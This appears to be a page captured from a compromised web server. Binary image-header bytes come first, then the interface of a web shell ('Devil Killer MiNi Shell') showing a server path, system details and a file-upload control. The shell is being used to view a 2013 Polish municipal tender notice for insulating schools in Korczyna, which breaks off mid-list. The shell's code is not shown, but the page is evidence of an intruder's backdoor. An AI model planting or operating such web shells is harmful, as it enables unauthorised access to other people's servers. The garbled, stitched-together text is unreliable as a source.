JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130430/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130430/66131-N-2013.html

<p class="kh_header"><b>Korczyna: Termomodernizacja obiektów użyteczności publicznej w Gminie Korczyna</b><br>
<b>Numer ogłoszenia: 66131 - 2013; data zamieszczenia: 30.04.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Korczyna , ul. Rynek 18a, 38-420 Korczyna, woj. podkarpackie, tel. 013 4354080, faks 013 4354096.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> korczyna.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Termomodernizacja obiektów użyteczności publicznej w Gminie Korczyna.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest wykonanie:
1/  termomodernizacji budynku Zespołu Szkół  w Iskrzyni
Zakres prac:
1) roboty rozbiórkowe :
- wykucie z muru istniejącej stolarki i ślusarki okiennej i drzwiowej,
- rozebranie obróbek blacharskich ( okucie ogniomurów, podokienników zewnętrznych),
-wywiezienie gruzu uzyskanego z rozbiórki poza plac budowy,
2)  ocieplenie ścian zewnętrznych budynku wraz z kolorystyką elewacji metodą mokrą:
-zamontowanie wzdłuż ścian pionowych rur PE śr. 15 mm dla przepuszczenia drutu  
 ocynkowanego (pionowych zwodów instalacji odgromowej),
-przeciągnięcie przez zamontowane rury PE prętów ocynkowanych - zwody pionowe instalacji odgromowej i połączenie ich z elementami poziomej instalacji odgromowej,
-montaż aluminiowej listwy startowej,
-docieplenie ścian zewnętrznych styropianem samo gasnącym FS 15 gr. 13 cm wg projektu,
-kołkowanie styropianu łącznikami plastikowymi w ilości 4 szt/m2,
-docieplenie szpalet okiennych i drzwiowych styropianem samo gasnącym FS 15 gr. 3 cm,
-wykonanie dodatkowej warstwy siatki do wysokości okien przyziemia,
-okucie narożników wypukłych kątownikiem aluminiowym,
-gruntowanie powierzchni elewacji farbą gruntującą,
-wykonanie wyprawy elewacyjnej tynkiem akrylowym baranek gr. 2,5 mm w kolorze 
  grupy II,
-wykonanie okładzin cokołu,
3)  ocieplenie od spodu stropu nad piwnicami płytami styropianowymi:
-dociepelenie betonowej płyty stropowej styropianem samo gasnącym FS 15 gr. 5 cm wg projektu,
-kołkowanie styropianu łącznikami plastikowymi w ilości 4 szt/m2,
-wykonanie warstwy siatki zatopionej w kleju,
-gruntowanie powierzchni elewacji farbą gruntującą,
-malowanie dwukrotne farbami emulsyjnymi,
4) ocieplenie stropu nad ostatnią kondygnacją wełną mineralną:
-ułożenie warstwy folii paroszczelnej na betonowym stropie ostatniej kondygnacji,
-ułożenie 1 warstwy wełny mineralnej gr. 17 cm,   
5)  wymiana istniejącej drewnianej stolarki okiennej na ze wzmocnionego PCV:
-wykucie z muru istniejących okien drewnianych,
-wykucie z muru istniejących zewnętrznych drzwi drewnianych,
-montaż w istniejących otworach okien ze wzmocnionego PCV,
-montaż w istniejących otworach drzwiowych zewnętrznych drzwi aluminiowych, szklonych  zestawem 2-szybowym k=1,1W.m2K,
6)konstrukcje drewniane:
-montaż drewnianej konstrukcji i podłogi podestów komunikacyjnych.
   
2/  termomodernizacji budynku Przedszkola Samorządowego w Korczynie
   Zakres prac:
1)	roboty rozbiórkowe :
 -  wykucie z muru istniejącej stolarki i ślusarki okiennej i drzwiowej,
-  wywiezienie gruzu uzyskanego z rozbiórki poza plac budowy, 
2) ocieplenie ścian zewnętrznych budynku wraz z kolorystyką elewacji metodą mokrą oraz wykonanie izolacji przeciwwodnej i przeciwwilgociowej poniżej poziomu terenu :
-zamontowanie wzdłuż ścian pionowych rur PE śr. 15 mm dla przepuszczenia drutu 
 ocynkowanego (pionowych zwodów instalacji odgromowej),
-przeciągnięcie przez zamontowane rury PE prętów ocynkowanych - zwody pionowe instalacji odgromowej i połączenie ich z elementami poziomej instalacji odgromowej,
- montaż aluminiowej listwy startowej,
- docieplenie ścian zewnętrznych styropianem samo gasnącym FS 15 gr. 13 cm wg projektu,
- kołkowanie styropianu łącznikami plastikowymi w ilości 4 szt/m2,
- docieplenie szpalet okiennych i drzwiowych styropianem samo gasnącym FS 15 gr. 3cm,
-wykonanie dodatkowej warstwy siatki do wysokości okien przyziemia,
-okucie narożników wypukłych kątownikiem aluminiowym,
-gruntowanie powierzchni elewacji farbą gruntującą,
-wykonanie wyprawy elewacyjnej tynkiem akrylowym baranek gr. 2,5 mm w kolorze 
 grupy II,
3)  ocieplenie od spodu stropu nad piwnicami płytami styropianowymi:
-docieplenie betonowej płyty stropowej styropianem samo gasnącym FS 15 gr. 5cm wg projektu,
-kołkowanie styropianu łącznikami plastikowymi w ilości 4 szt/m2,
-wykonanie warstwy siatki zatopionej w kleju,
-gruntowanie powierzchni elewacji farbą gruntującą,
-malowanie dwukrotne farbami emulsyjnymi,
4)  ocieplenie stropodachu nie wentylowanego styropianem laminowanym papą wraz z wykonaniem wierzchniego krycia połaci dachowych papą termozgrzewalną:
-demontaż istniejącej instalacji odgromowej,
-częściowy demontaż papowego pokrycia dachowego,
-uzupełnienie pokrycia dachowego papą,
-przyklejenie na powierzchni dachu styropianu gr. 15 cm laminowanego papą asfaltową,
-przyklejenie wzdłuż okapu dachu klina ze styropianu gr. 15 cm laminowanego papą 
asfaltową,
-remont pokrycia dachowego jedną warstwą papy termozgrzewalnej podkładowej i jednej warstwy papy termozgrzewalnej nawierzchniowej,
-wywinięcie nawierzchniowej papy termozgrzewalnej na ściany boczne kominów z 
przyklejeniem i zabezpieczeniem krawędzi papy listwą aluminiową przykręconą do ściany kominów,
-ponowny montaż instalacji odgromowej,
5)wymiana istniejącej drewnianej stolarki okiennej na ze wzmocnionego PCV oraz drzwiowej na aluminiową i ze wzmocnionego PCV:  
-wykucie z muru istniejących okien drewnianych,
-wykucie z muru istniejących zewnętrznych drzwi drewnianych,
-montaż w istniejących otworach okien ze wzmocnionego PCV,
-montaż w istniejących otworach drzwiowych zewnętrznych drzwi aluminiowych, szklonych zestawem 2-szybowym k=1,1 W.m2K,

3/  termomodernizacji budynków Zespołu Szkól w Korczynie
 Zakres prac:
1)roboty rozbiórkowe :
-wykucie z muru istniejącej stolarki i ślusarki okiennej i drzwiowej, 
-z muru podokienników lastrykowych,
-rozebranie obróbek blacharskich (okucie ogniomurów, podokienników zewnętrznych),
-rozebranie betonowej konstrukcji schodów zewnętrznych,
-rozebranie ścian i filarów z cegły pełnej,
-rozebranie betonowej nawierzchni podjazdu do kotłowni,
-rozebranie płytki odbojowej z betonowych płytek chodnikowych i betonowej kostki  brukowej,
-wywiezienie gruzu uzyskanego z rozbiórki poza plac budowy,
2) roboty ziemne,
3) ocieplenie ścian zewnętrznych wraz z kolorystyką elewacji metodą mokrą oraz do wykonania izolacji przeciwwodnej i przeciwwilgociowej poniżej poziomu terenu:
-  zamontowanie wzdłuż ścian pionowych rur PE śr. 15 mm dla przepuszczenia drutu ocynkowanego (pionowych zwodów instalacji odgromowej),    
-  przeciągnięcie przez zamontowane rury PE prętów ocynkowanych - zwody pionowe instalacji odgromowej i połączenie ich z elementami poziomej instalacji odgromowej,
-  montaż aluminiowej listwy startowej,
-  docieplenie ścian zewnętrznych styropianem FS 15 gr. 13 cm i styropianem ekstradowanym gr. 10 cm wg projektu,
-  kołkowanie styropianu łącznikami plastikowymi w ilości 4 szt/m2,
-  docieplenie szpalet okiennych i drzwiowych styropianem samo gasnącym FS 15 gr. 3 cm,
-  wykonanie dodatkowej warstwy siatki do wysokości okien przyziemia,
-  okucie narożników wypukłych kątownikiem aluminiowym,
-  gruntowanie powierzchni elewacji farbą gruntującą,
-  wykonanie wyprawy elewacyjnej tynkiem akrylowym baranek gr. 2,5mm w kolorze grupy II,
-  wykonanie okładzin cokołu,
4)  ocieplenie stropodachu nie wentylowanego styropianem laminowanym papą wraz z wykonaniem wierzchniego krycia połaci dachowych papą termozgrzewalną:
-  demontaż istniejącej instalacji odgromowej,
-  częściowy demontaż papowego pokrycia dachowego,
-  uzupełnienie pokrycia dachowego papą,
-  przyklejenie na powierzchni dachu styropianu gr. 15 cm laminowanego papą asfaltową,
-  przyklejenie wzdłuż okapu dachu ze styropianu gr. 15 cm laminowanego papą asfaltową,
-  remont pokrycia dachowego jedną warstwą papy termozgrzewalnej podkładowej i jednej warstwy papy termozgrzewalnej nawierzchniowej,
-  wywinięcie nawierzchniowej papy termozgrzewalnej na ściany boczne kominów z 
przyklejeniem i zabezpieczeniem krawędzi papy listwą aluminiową przykręconą do ściany kominów,
5)  wymiana istniejącej drewnianej stolarki okiennej na ze wzmocnionego PCV oraz drzwiowej na aluminiową i ze wzmocnionego PCV: 
    -  wykucie z muru istniejących okien drewnianych,
-  wykucie z muru istniejących zewnętrznych drzwi drewnianych,
-  montaż w istniejących otworach okien ze wzmocnionego PCV,
-  montaż w istniejących otworach drzwiowych zewnętrznych drzwi aluminiowych, szklonych zestawem 2-szybowym k=1,1W.m2K,
6)  roboty murarskie: 
-  roboty murarskie ścian (zamurowanie otworów okiennych) z bloczków PGS gr. 24 cm,
-  roboty murarskie ścian i filarów z cegły pełnej,
7)  konstrukcje drewniane:
-  montaż drewnianej konstrukcji daszków nad wejściami bocznymi do budynków,
8)  konstrukcje dachowe:
-  montaż wiatroizolacji z folii paro przepuszczalnej,
-  montaż pokrycia dachowego z powlekanej blachy trapezowej,
-  montaż obróbek blacharskich z powlekanej blachy płaskiej,
9)  roboty betonowe:
-  wykonanie żelbetowej konstrukcji schodów zewnętrznych,
-  wykonanie podłoży betonowych na podłożu gruntowym,
10)  zewnętrzne okładziny schodów płytkami GRES:
-  wykonanie izolacji powłokowej pionowej ścian fundamentowych,
-  posadzki z płytek GRES,
11)  wyprawa elewacyjna na elementach nie wymagających ocieplenia:
 -  przyklejenie warstwy siatki na wykańczanej powierzchni zatopionej w warstwie kleju,
-  gruntowanie powierzchni elewacji farbą gruntującą,
-  wykonanie wyprawy elewacyjnej tynkiem akrylowym baranek gr. 2,5 mm w kolorze grupy II,
12)  podbudowa z kruszywa łamanego (wykonanie podbudowy pod płytkę odbojowa z betonowej kostki brukowej) :
-  ułożenie warstw podbudowy w gotowym korycie,
13)  wykonanie utwardzenia nawierzchni z betonowych płyt chodnikowych:
-  wykonanie nawierzchni z betonowych płyt chodnikowych 50x50x7 cm na podsypce piaskowo-cementowej; uzupełnienie rozebranej wcześniej płytki odbojowej.
14)  kompleksowe wykonanie instalacji wspomagającej wytwarzanie c.w.u  przy wykorzystaniu odnawialnych źródeł energii:
-  wykonanie konstrukcji pod kolektory słoneczne,
-  montaż kolektorów słonecznych na dachu,
-  posadowienie dwóch zasobników solarnych o pojemności 1000 dm3 i podłączenie do istniejącej instalacji, 
-  wykonanie rurociągów solarnych łączących kolektory z buforami,
-  wykonanie rurociągów ciepłej i zimnej wody,
-  montaż grupy pompowej solarnej,
-  wykonanie prób ciśnienia instalacji c.w.u,
-  napełnienie instalacji solarnej czynnikiem solarnym,
-  wykonanie prób ciśnienia instalacji solarnej,
-  montaż regulatora solarnego i czujników temperatury,
-  programowanie regulatora,
-  uruchomienie instalacji,
-  remont pomieszczenia zamontowania instalacji solarnej (wg wytycznych budowlanych z projektu),
-  demontaż istniejącego zbiornika ciepłej wody użytkowej, rurociągów i zaworów. 
15) płukanie instalacji centralnego ogrzewania

 Szczegółowy opis przedmiotu zamówienia określają przedmiary robót, specyfikacje techniczne wykonania i odbioru robót, rysunki które stanowią załącznik do SIWZ.

2. Wymagania dodatkowe w ramach przedmiotu zamówienia:
  2.2.1  Wykonawca zobowiązuje się:
a) wykonać przedmiot zamówienia zgodnie z przedmiarem robót, który stanowi załącznik do SIWZ, 
b) wykonać przedmiot zamówienia zgodnie z obowiązującymi w tym zakresie przepisami prawnymi, w szczególności z Prawem budowlanym, wraz z przepisami wykonawczymi, przepisami BHP, postanowieniami umowy, specyfikacją istotnych warunków zamówienia, zgodnie z aktualnym poziomem wiedzy technicznej, należytą starannością, etyka zawodową, przez osoby posiadające wymagane kwalifikacje i uprawnienia,
c)  wyznaczyć osobę do kontaktowania się bezpośrednio z Zamawiającym w sprawie wykonania przedmiotu umowy,
d) nie wykorzystywać otrzymanych materiałów w celu innym niż określono w umowie, a w szczególności nie ma prawa udostępniać je osobom trzecim,
e) wykonać zamówienie dodatkowe  zlecone  przez Zamawiającego o wartości do 50% zamówienia podstawowego. W przypadku konieczności wykonania takich prac Wykonawca przed przystąpieniem do ich realizacji przedstawi Zamawiającemu kosztorys do uzgodnienia. Zlecenie wykonania zamówienia dodatkowego  nastąpi przez podpisanie odrębnej umowy.
2.2.2. Zastosowane przez Wykonawcę materiały i urządzenia muszą być dopuszczone do obrotu, stosowania w budownictwie  oraz  posiadać deklarację zgodności lub certyfikat zgodności z Polską Normą, polską aprobatą techniczną, polskimi specyfikacjami technicznymi lub normą innych państw członkowskich Europejskiego Obszaru Gospodarczego, względnie aprobatą techniczną oraz certyfikat na znak bezpieczeństwa dla materiałów, które tego wymagają z określeniem partii której one dotyczą.
2.2.3. Za ewentualne szkody spowodowane podczas prac budowlanych na nieruchomościach objętych inwestycją odpowiada Wykonawca. W szczególności w przypadku uszkodzenia lub zniszczenia mienia Zamawiającego lub osób trzecich w toku realizacji przedmiotu umowy, Wykonawca zobowiązuje się doprowadzić go do stanu pierwotnego i naprawić szkodę na własny koszt. 
2.2.4. Wykonawca oświadcza, że przy realizacji przedmiotu umowy nie dokona naruszenia cudzych praw wyłącznych oraz, że w razie stwierdzenia ich naruszenia poniesie wszelkie konsekwencje prawne i finansowe z tytułu ewentualnych roszczeń.
2.2.5. W przypadku zmiany obowiązujących przepisów prawa w szczególności związanych z przedmiotem zamówienia Zamawiający i Wykonawca określą zakres czynności zmierzających do wypełnienia postanowień umowy i sposób ich realizacji.
2.2.6. Wykonawca zobowiązuje się do stałego kontaktu z Zamawiającym w sprawach dotyczących przedmiotu zamówienia.
2.2.7. Wykonawca ponosi odpowiedzialność za jakość przedmiotu umowy oraz terminowość jego wykonania..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.40.00.00-1, 45.45.00.00-6, 45.42.11.00-5, 45.42.11.10-8, 45.33.10.00-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 28.02.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki udziału w postępowaniu określone w art. 22 ust.1 ustawy Prawo zamówień publicznych, w tym:
Spełniają warunek dysponowania osobami zdolnymi do wykonania zamówienia.
Opis sposobu dokonania oceny spełniania warunku.
Zamawiający uzna powyższy warunek za spełniony o ile wykonawca wykażę, iż dysponuje co najmniej jedną osobą posiadającą uprawnienia do kierowania robotami budowlanymi w specjalnościach:
a)	konstrukcyjno-budowlanej,
b)	instalacyjnej w zakresie instalacji sanitarnych.
Zamawiający dopuszcza również możliwość uznania uprawnień wynikających z innych niż krajowe przepisów np. treści dyrektyw, zawartych umów międzynarodowych i innych przepisów, które potwierdzą spełnianie warunku dotyczącego dysponowania osobami zdolnymi do wykonania zamówienia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna powyższy warunek za spełniony o ile wykonawca wykaże wykonanie w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie co najmniej dwóch zamówień w zakresie wykonywania robót budowlanych odpowiadających rodzajem robotom budowlanym stanowiącym przedmiot zamówienia o wartości nie mniejszej niż  500 000zł brutto każde z zamówień.
W przypadku oferty wspólnej wykonawców warunek wiedzy i doświadczenia musi spełniać przynajmniej jeden z wykonawców.
W celu wykazania spełniania warunku wykonawca zobowiązany jest złożyć:
a/ wykaz robót budowlanych z podaniem ich rodzaju i wartości oraz daty i miejsca wykonania,
b/ dowody  dotyczące najważniejszych robót określających czy roboty te zostały wykonane w sposób należyty oraz wskazujące, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone.
Dowodami, o których mowa powyżej są:
a/	poświadczenie;
Zgodnie z wytycznymi UZP /poprzez poświadczenie należy rozumieć dokument potwierdzający określone fakty lub wiedzę wykonawcy, którego wystawcą nie jest wykonawca. Poświadczeniem zatem będą zatem zarówno dokumenty wystawione przez podmiot, na rzecz którego roboty budowlane zostały wykonane, np. referencje, jak i dokumenty wystawione przez inny podmiot, który posiada kompetencje, by poświadczyć określone fakty/.
b/ oświadczenie wykonawcy - jeżeli z uzasadnionych przyczyn o obiektywnym charakterze wykonawca nie jest w stanie uzyskać poświadczenia, o którym mowa powyżej;
c/ w postępowaniach o udzielenie zamówienia publicznego wszczynanych w okresie 12 miesięcy liczonych od 20 lutego 2013r. wykonawca, w miejsce poświadczeń może przedkładać   dokumenty potwierdzające wykonanie robót budowlanych zgodnie z zasadami sztuki budowlanej i ich prawidłowe ukończenie.
W przypadku gdy Zamawiający jest podmiotem, na rzecz którego roboty wskazane w w/w wykazie zostały wcześniej wykonane - wykonawca nie ma obowiązku przedkładania dowodów, o których mowa w pkt 9.4.2.b/.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a) złożyć wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za kierowanie robotami budowlanymi wraz z informacjami na temat ich kwalifikacji zawodowych niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności,
b) złożyć oświadczenie stwierdzające, iż osoby/ ba  wymienione/ na w wykazie posiadają /da wymagane uprawnienia,
c) podać informację o podstawie dysponowania osobami/ bą ujętymi/ tą w wykazie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
